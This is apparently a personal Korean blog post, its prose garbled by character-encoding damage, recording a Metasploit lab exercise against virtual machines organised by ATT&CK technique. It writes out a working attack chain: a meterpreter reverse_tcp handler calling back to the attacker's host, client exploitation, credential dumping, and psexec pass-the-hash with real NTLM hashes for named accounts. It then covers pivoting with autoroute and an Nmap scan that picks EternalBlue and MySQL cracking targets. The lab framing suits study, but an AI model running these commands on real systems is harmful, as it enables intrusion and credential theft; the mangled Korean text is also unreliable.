0. ์ธ์ ์ฐ๊ฒฐ
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.86.130
set LPORT 4444
exploit
1. Exploit ์ทจ์ฝ์ ๊ณต๊ฒฉ (T1203: Exploitation for Client Execution)
- ๋ชฉ์ : ํด๋ผ์ด์ธํธ ์ธก ์ํํธ์จ์ด๋ ์์คํ ์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ์ ์ฑ ์ฝ๋๋ฅผ ์คํ.
- ๊ณผ์ :
[๊ณผ์ ]
1.
set RHOST <ํ๊ฒ IP ์ฃผ์>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <๊ณต๊ฒฉ์ IP ์ฃผ์>
set LPORT <๊ณต๊ฒฉ์ ํฌํธ>
set RHOSTS 192.168.86.134
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.86.130
set LPORT 4444
exploit
2. T1003: Credential Dumping (ํฌ๋ฆฌ๋ด์ ๋คํ)
- ๋ชฉ์ : ํ๊ฒ ์์คํ ์ ์ฌ์ฉ์ ๊ณ์ ํฌ๋ฆฌ๋ด์ ์ ๋คํํ์ฌ ํด์๋ ํจ์ค์๋๋ฅผ ์ถ์ถ
- ๋จ๊ณ: ํ์ฑํ๋ Meterperter ์ธ์ ์ ํตํด ์ฌ์ฉ์ ๊ณ์ ์ ํจ์ค์๋ ํด์ ๊ฐ์ ๋คํํ๋ค. ๋คํ๋ ํด์ ๊ฐ์ ์ฌ์ฉํ์ฌ Pass the Hash์ ๊ฐ์ ํ์ ๊ณต๊ฒฉ์ ์๋ํ ์ ์์ด ์ ์ฉํ๋ค.
3. Pass the Hash ๊ณต๊ฒฉ (T1075: Pass the Hash)
- ๋ชฉ์ : ํด์๋ ํฌ๋ฆฌ๋ด์ ์ ์ฌ์ฉํ์ฌ ์ธ์ฆ์ ์ฐํ.(๋คํ ํ์ ๊ณต๊ฒฉ)
- ๋จ๊ณ: ํ๊ฒ ์์คํ ์์ ํด์๋ฅผ ๋คํํ ํ, ํด๋น ํด์๋ฅผ ์ด์ฉํ์ฌ ๋ค๋ฅธ ์์คํ ์ ์ ๊ทผ
use exploit/windows/smb/psexec
set SMBUser <์ฌ์ฉ์๋ช >
set SMBPass <ํด์ ๊ฐ>
set RHOST <ํ๊ฒ IP>
exploit
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set RHOSTS 192.168.86.134
exploit
set SMBUser honge
set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
set RHOSTS 192.168.86.134
exploit
set SMBUser jjh
set SMBPass aad3b435b51404eeaad3b435b51404ee:5c897c5cae4fea0eabdaf0cb41fc1dd9
set RHOSTS 192.168.86.134
exploit
T1059: Command and Scripting Interpreter (๋ช ๋ น ๋ฐ ์คํฌ๋ฆฝํ ์ธํฐํ๋ฆฌํฐ)
- ๋ชฉ์ : ํ๊ฒ ์์คํ ์์ ๋ช ๋ น์ ์คํํ๊ฑฐ๋ ์คํฌ๋ฆฝํธ๋ฅผ ์คํ
- ๋จ๊ณ:
- shell ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์ฌ ํ๊ฒ ์์คํ ์์ ์ปค๋งจ๋ ํ๋กฌํํธ์ ์ง์ ์ ๊ทผํ ์ ์๋ค
๋คํธ์ํฌ ํ์ ๋ฐ ๊ณต๊ฒฉ ๊ธฐ๋ฒ
1. ๋คํธ์ํฌ ์ค์ ํ์ธ (T1016: System Network Configuration Discovery)
- ๋ชฉ์ : ํ๊ฒ ์์คํ ์ ๋คํธ์ํฌ ์ค์ ์ ํ์ธํ์ฌ, ํ๊ฒ์ด ์ํ ๋คํธ์ํฌ์ ๊ตฌ์กฐ์ IP ๋ฒ์๋ฅผ ํ์
- ๋จ๊ณ:
- Meterpreter ์ธ์ ์์ ๋ค์ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํด ๋คํธ์ํฌ ์ค์ ์ ํ์ธ
2. ๋คํธ์ํฌ ํธ์คํธ ํ์ (T1046: Network Service Scanning)
- ๋ชฉ์ : ๋คํธ์ํฌ ๋ด ๋ค๋ฅธ ํธ์คํธ๋ฅผ ์ฐพ๊ณ , ํด๋น ํธ์คํธ์์ ์คํ ์ค์ธ ์๋น์ค๋ฅผ ์๋ณํ์ฌ ๊ณต๊ฒฉ ๊ฐ๋ฅํ ๋์์ด ์๋์ง ํ์ธ
- Meterpreter์์ run post/multi/manage/autoroute ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์ฌ ํ๊ฒ ๋คํธ์ํฌ ๋ด์์ ๋ค๋ฅธ ํธ์คํธ๋ก ์ด๋ํ ์ ์๋๋ก ๋ผ์ฐํ ์ค์
ํ์ฌ autoroute ๋ชจ๋์ ์ฌ์ฉํ์ฌ ํ๊ฒ ์์คํ ์ ์๋ธ๋ท์ ๋ํ ๋ผ์ฐํธ๋ฅผ ์ฑ๊ณต์ ์ผ๋ก ์ถ๊ฐํ ์ํ๋ค.
์ด๋ก ์ธํด, ํ๊ฒ ์์คํ ์ด ์ํ 192.168.86.0/24 ์๋ธ๋ท๊ณผ Bluetooth ๋คํธ์ํฌ์ธ 169.254.0.0/16 ์๋ธ๋ท์ ๋ํ ๊ฒฝ๋ก๊ฐ ์ค์ ๋์๋ค
2. Nmap์ ์ฌ์ฉํ์ฌ ๋คํธ์ํฌ ์์ ๋ค๋ฅธ ํธ์คํธ๋ฅผ ์ค์บํ ์ ์๋ค.
Meterpreter ๋ด์์ Nmap ์ค์บ์ ์คํํ๋ ค๋ฉด, Meterpreter ์ธ์ ์ ์ ์งํ ์ํ์์ ๊ณต๊ฒฉ์ ์์คํ ์ ํฐ๋ฏธ๋์์ ์คํํด์ผ ํ๋ค.
์ค์ ๋ ๋ผ์ฐํธ์ ๋ฐ๋ผ ๋คํธ์ํฌ ์์ ๋ค๋ฅธ ํธ์คํธ๋ฅผ ํ์ํ๊ณ , ์ด๋ ค ์๋ ํฌํธ๋ฅผ ์ค์บํ ์ ์๊ฒ ๋๋ค!!
์๋ธ๋ท ์ค์บํด์ผ ๋จ
ํ์ฌ 192.168.86.0/24 ๋คํธ์ํฌ ๋์ญ์์ 5๊ฐ์ ํธ์คํธ๊ฐ ๋ฐ๊ฒฌ๋์์ผ๋ฉฐ, ๊ฐ ํธ์คํธ์์ ์ด๋ฆฐ ํฌํธ์ ์คํ ์ค์ธ ์๋น์ค๊ฐ ๋์ ์๋ค.
Nmap ์ค์บ ๊ฒฐ๊ณผ ํด์:
- 192.168.86.1
- ์ํ: ํธ์คํธ ํ์ฑํ (Host is up)
- ์ด๋ฆฐ ํฌํธ:
- 3306/tcp open mysql: ์ด ํธ์คํธ์์๋ MySQL ๋ฐ์ดํฐ๋ฒ ์ด์ค ์๋น์ค๊ฐ ์คํ ์ค
- MAC ์ฃผ์: 00:50:56:6C:00:08 (VMware ๊ฐ์ ๋จธ์ )
- 192.168.86.2
- ์ํ: ํธ์คํธ ํ์ฑํ
- ์ด๋ฆฐ ํฌํธ:
- 53/tcp open domain: ์ด ํฌํธ๋ DNS(Domain Name System) ์๋น์ค๊ฐ ์คํ ์ค
- MAC ์ฃผ์: 00:50:56:F4:2F:71 (VMware ๊ฐ์ ๋จธ์ )
- 192.168.86.134
- ์ํ: ํธ์คํธ ํ์ฑํ
- ์ด๋ฆฐ ํฌํธ:
- 135/tcp open msrpc: Microsoft RPC(Remote Procedure Call) ์๋น์ค๊ฐ ์ด๋ ค ์์
- 139/tcp open netbios-ssn: NetBIOS ์ธ์ ์๋น์ค ์คํ ์ค
- 445/tcp open microsoft-ds: SMB(Server Message Block) ์๋น์ค๋ ์ด๋ ค์์. SMB๋ ํ์ผ ๊ณต์ , ํ๋ฆฐํฐ ๊ณต์ ๋ฑ์ ์ฌ์ฉ๋๋ฉฐ, ์ฌ๋ฌ ์ทจ์ฝ์ (CVE-2017-0144 EternalBlue ๋ฑ)๊ณผ ์ฐ๊ฒฐ๋์ด ์์
- 49152/tcp ~ 49160/tcp open unknown: ์ด ํฌํธ๋ค์ ์ผ๋ฐ์ ์ผ๋ก Windows์์ ๋์ ์ผ๋ก ํ ๋น๋ RPC ๊ด๋ จ ํฌํธ์ผ ๊ฐ๋ฅ์ฑ์ด ๋๋ค๊ณ ํจ
- MAC ์ฃผ์: 00:0C:29:8B:AE:81 (VMware ๊ฐ์ ๋จธ์ )
- 192.168.86.254
- ์ํ: ํธ์คํธ ํ์ฑํ
- ๋ชจ๋ ํฌํธ๊ฐ ์๋ตํ์ง ์์(ignored ์ํ)
- MAC ์ฃผ์: 00:50:56:6C:AB(VMware ๊ฐ์ ๋จธ์ )
- 192.168.86.130
- ์ํ: ํธ์คํธ ํ์ฑํ
- ์ด๋ฆฐ ํฌํธ:
- 80/tcp open http: HTTP ์๋น์ค๊ฐ ์ด๋ ค ์์ผ๋ฏ๋ก ์น ์๋ฒ๊ฐ ์คํ ์ค์ผ ๊ฐ๋ฅ์ฑ์ด ์๋ค
- MAC ์ฃผ์: (ํ๊ธฐ๋์ง ์์)
์ฃผ์ ๊ณต๊ฒฉ ๋์:
- 192.168.86.134:
- ์ด ์์คํ ์ ์ฌ๋ฌ ํฌํธ๊ฐ ์ด๋ ค ์๊ณ , ํนํ SMB(445) ํฌํธ์ MSRPC(135) ํฌํธ๊ฐ ์ด๋ ค์์
- EternalBlue(CVE-2017-0144)์ ๊ฐ์ SMB ์ทจ์ฝ์ ์ ์ ์ฉํ ์ ์๋ ๊ฐ๋ฅ์ฑ์ด ์์ผ๋ฉฐ, RPC ํฌํธ๋ ์๊ฒฉ ์ฝ๋ ์คํ ์ทจ์ฝ์ ์ด ์กด์ฌํ ์ ์์
- 192.168.86.1:
- MySQL ์๋น์ค๊ฐ ์คํ ์ค์ธ ๊ฒ์ผ๋ก ๋ณด์ MySQL์์ ๊ธฐ๋ณธ์ ์ผ๋ก ์ทจ์ฝํ ์ค์ ์ด ์๊ฑฐ๋ ์ฝํ ๋น๋ฐ๋ฒํธ๋ก ์ค์ ๋ ๊ฒฝ์ฐ, SQL Injection ๋๋ ๋น๋ฐ๋ฒํธ ํฌ๋์ ์๋ํ ์ ์๋ค
(์ด๊ฑด ๋ค์ ๊ธฐํ์..ใ ใ )
- MySQL ์๋น์ค๊ฐ ์คํ ์ค์ธ ๊ฒ์ผ๋ก ๋ณด์ MySQL์์ ๊ธฐ๋ณธ์ ์ผ๋ก ์ทจ์ฝํ ์ค์ ์ด ์๊ฑฐ๋ ์ฝํ ๋น๋ฐ๋ฒํธ๋ก ์ค์ ๋ ๊ฒฝ์ฐ, SQL Injection ๋๋ ๋น๋ฐ๋ฒํธ ํฌ๋์ ์๋ํ ์ ์๋ค
- 192.168.86.130:
- HTTP(80) ํฌํธ๊ฐ ์ด๋ ค ์์ผ๋ฏ๋ก ์น ์๋ฒ์ ๋ํด ์ทจ์ฝ์ ์ค์บ์ ์๋ํ ์ ์๊ณ ํนํ, ์น ์๋ฒ๊ฐ ๊ตฌ๋ฒ์ ์ธ ๊ฒฝ์ฐ ์ฌ๋ฌ ์ทจ์ฝ์ ์ด ์์ ์ ์๋ค.
'๐ง Linux ์๊ณ ์ฐ์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
๋ด๊ฐ ํผ์ ํด๋ณธ ์นผ๋ฆฌ ๋ฆฌ๋ ์ค ๊น์๋ณด๊ธฐ (0) | 2024.11.29 |
---|---|
[MSF]๋ฉํ์คํ๋ก์ ํ๊ฒฝ์์ C2 ์๋ฒ์ ํด๋ผ์ด์ธํธ ์๋ฒ ๊ตฌ์ถํ๊ธฐ (1) | 2024.10.17 |
[metasploit] UAC ์ฐํ ๊ถํ ์์น ์๋ _๊ธฐ๋ณธ ์ค์ต (0) | 2024.10.16 |
[๋ฆฌ๋ง2๊ธ2์ฐจ] ์ค๋์ ์ค๋ต๋ ธํธ๐ซ (0) | 2024.09.07 |
[๋ฆฌ๋ง2๊ธ2์ฐจ] ์ค๋์ ์ค๋ต๋ ธํธ๐ซ (1) | 2024.09.01 |